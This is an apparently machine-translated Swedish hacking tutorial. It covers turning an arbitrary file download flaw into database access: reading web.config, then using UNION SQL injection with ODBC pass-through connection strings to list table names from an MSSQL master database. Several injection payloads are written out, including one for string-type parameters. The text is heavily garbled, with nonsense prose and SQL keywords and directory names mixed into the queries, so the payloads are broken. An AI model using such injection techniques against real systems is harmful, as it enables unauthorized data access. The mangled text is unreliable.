Första punkten har denna metod varit en lång tid sedan, men förmodligen i huvudet med en lugn stund för länge, redan i den glömda staten. Tack Trace information. Stöter ofta på godtyckliga sårbarhet Hämta den allmänna behandlingsmetoden är att återsända databasanslutning fil att hämta, och då fjärranslutningen.
Stöter ofta på godtyckliga sårbarhet Hämta den allmänna behandlingsmetoden är att återsända databasanslutning fil att ladda ner och sedan gå upp fjärranslutningen. Idealtillstånd än MSSQL och MySQL, särskilt i databasen och webben är inte fallet med separation, Backup skal, export SHELL, kan användas på många sätt.
Men om databasen och WEB separation, och databas nätverk Buke, inklusive Internet, eller har en brandvägg och så andra sätt att göra oss oförmögna att ens fjärrdatabasen, kan vi anta att några av de re svårt om inte omöjligt att hitta en MSSQL injektion punkt i många fall oftast hjälplösa.
Här till MSSQL som ett exempel, hände det att hitta en godtycklig sårbarhet Hämta, direkt under web.config komma tillbaka för att se, däribland nät upptäckt databas för att hitta en halv dag hittade inte insprutningspunkten, en liten marginell konstaterar, finns det något en station är synd TILLGÅNG databas. Gissa bordet och tillbaka. Dock är bakgrunden målet stationen känd, då beredd att läsa från åtkomstpunkten av målpunkt injektionen administratörskonto. Vissa intuitiv, som ges direkt under min lokala testresultat:
Få en enkel punkt, de tre områdena, ID, XM, XB, ID-nummer typ, följt av två tecken.
Antag att det finns kryphål i dokumentet för genomförandet av SQL-uttryck väljer backup bin konf config uppgifter eshow_sitemap.html generate.sh logga maint sitemap.html svn tmp från test whrere id = 1
Det finns tre områden, vi använder UNIONENS gemensam undersökning för att matcha vad han är (black-box samarbete med beställning av fält eller för att bestämma antalet brute-force)
Välj Säkerhetskopiera bin conf config uppgifter eshow_sitemap.html generate.sh logga maint sitemap.html svn test tmp FRÅN där id = 999999 unionen Välj upp 1,2 1, namn från [ODBC, Driver = SQL Server UID = dbo, pwd = dBA ; Server =*****; DataBase = mästare]. ku
Här huvuddatabasen jag skapat en tabell vid namn KU, över denna fråga, eftersom id = 999999 existerar inte under inverkan av den gemensamma utredningen webbinnehåll på originalet visar platsen för databasen tillgång visa ur vår struktur UNIONENS frågeresultat, namn på fältet i en teckenfönstret position.
ku innehållet i denna tabell i fältet Namn visas på webben på motsvarande position, men detta är absolut inte vad vi vill, vi vill ha hela tabellen struktur och innehåll
Att bemästra som ett exempel, här är resultaten av simuleringen, i förväg jag redan vet struktur befälhavaren, bekväma och resultaten kommer att jämföras med kontrollsumman är felaktig.
Välj Säkerhetskopiera bin conf config uppgifter eshow_sitemap.html generate.sh logga maint sitemap.html svn test tmp FRÅN där id = 999999 unionen Välj upp en 1,2, table_name från [ODBC, Driver = SQL Server UID = dbo, pwd = dBA ; Server =*****; DataBase = mästare]. information_schema.tables
Denna master databastabell namn kom först ut.
Sätt dig bakom namnet på tabellen är enkel.
Välj Säkerhetskopiera bin conf config uppgifter eshow_sitemap.html generate.sh logga maint sitemap.html svn test tmp FRÅN där id = 999999 unionen Välj upp en 1,2, table_name från [ODBC, Driver = SQL Server UID = dbo, pwd = dBA ; Server =*****; DataBase = mästare]. information_schema.tables där table_name inte (välj top 1 table_name från [ODBC, Driver = SQL Server UID = dbo, pwd = dba; Server =****; DataBase = mästare]. information_schema.tables)
Underlägsen ras klass driva konventionell metod för att få de fältnamn och fältinnehåll av koden i sina egna besvärligt.
Om databasen där ID är en karaktär, då
Välj Säkerhetskopiera bin conf config uppgifter eshow_sitemap.html generate.sh logga maint sitemap.html svn test tmp FRÅN där id = '999999 'unionen Välj upp en 1,2, table_name från [ODBC, Driver = SQL Server UID = dbo, PWD = dba; Server =***; DataBase = mästare]. information_schema.tables där "1" = "1"